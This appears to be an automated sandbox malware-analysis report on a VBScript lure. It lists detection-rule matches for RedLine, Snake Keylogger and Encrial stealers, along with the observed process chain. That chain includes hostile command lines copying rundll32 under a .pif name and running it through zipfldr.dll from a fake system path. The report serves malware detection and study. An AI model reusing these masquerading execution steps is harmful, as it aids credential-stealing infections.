          Source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0000000A.00000001.1837489352.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000006.00000002.2971941444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0000000F.00000001.1912204476.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0000000F.00000002.2971881656.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 00000006.00000001.1720780507.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 0000000F.00000002.3012120383.00000000335A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 0000000A.00000002.2971876015.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
          Source: 0000000F.00000002.2998810475.0000000030BC9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 00000006.00000002.3011915133.000000001FF40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
          Source: 00000006.00000002.2996815062.000000001CE19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: fptrsiaN.pif PID: 5316, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: fptrsiaN.pif PID: 1196, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: Process Memory Space: fptrsiaN.pif PID: 2836, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
          Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
          Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
          Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
          Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@23/10@4/4
          Source: C:\Users\Public\ndpha.pifCode function: 8_2_00153C66 LoadLibraryExW,GetLastError,FormatMessageW,RtlImageNtHeader,SetProcessMitigationPolicy,8_2_00153C66
          Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_029C79B4 GetDiskFreeSpaceA,1_2_029C79B4
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,6_2_004019F0
          Source: C:\Users\Public\ndpha.pifCode function: 8_2_0015205A CoCreateInstance,8_2_0015205A
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,@__unlockDebuggerData$qv,VariantClear,VariantClear,VariantClear,6_2_004019F0
          Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\NaisrtpfF.cmdJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1068:120:WilError_03
          Source: C:\Users\Public\Libraries\fptrsiaN.pifMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs"
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCommand line argument: 08A6_2_00413780
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCommand line argument: 08A6_2_00413780
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCommand line argument: 08A6_1_00413780
          Source: C:\Users\Public\ndpha.pifCommand line argument: WLDP.DLL8_2_00154136
          Source: C:\Users\Public\ndpha.pifCommand line argument: localserver8_2_00154136
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCommand line argument: 08A10_2_00413780
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCommand line argument: 08A10_2_00413780
          Source: C:\Users\Public\Libraries\fptrsiaN.pifCommand line argument: 08A10_1_00413780
          Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: Draft doc PI ITS15235.vbsVirustotal: Detection: 49%
          Source: Draft doc PI ITS15235.vbsReversingLabs: Detection: 40%
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Draft doc PI ITS15235.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NaisrtpfF.cmd" "
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\\Naisrtpf10.cmd
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pif
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pif
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\ndpha.pif C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif
          Source: unknownProcess created: C:\Users\Public\Libraries\Naisrtpf.PIF "C:\Users\Public\Libraries\Naisrtpf.PIF"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pif
          Source: unknownProcess created: C:\Users\Public\Libraries\Naisrtpf.PIF "C:\Users\Public\Libraries\Naisrtpf.PIF"
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFProcess created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pif
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\NaisrtpfF.cmd" "Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\\Naisrtpf10.cmdJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pifJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\rundll32.exe C:\\Users\\Public\\ndpha.pifJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\ndpha.pif C:\\Users\\Public\\ndpha.pif zipfldr.dll,RouteTheCall C:\Windows \SysWOW64\svchost.pif Jump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFProcess created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pifJump to behavior
          Source: C:\Users\Public\Libraries\Naisrtpf.PIFProcess created: C:\Users\Public\Libraries\fptrsiaN.pif C:\Users\Public\Libraries\fptrsiaN.pif
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: url.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\x.exeSection loaded: am.dllJump to behavior
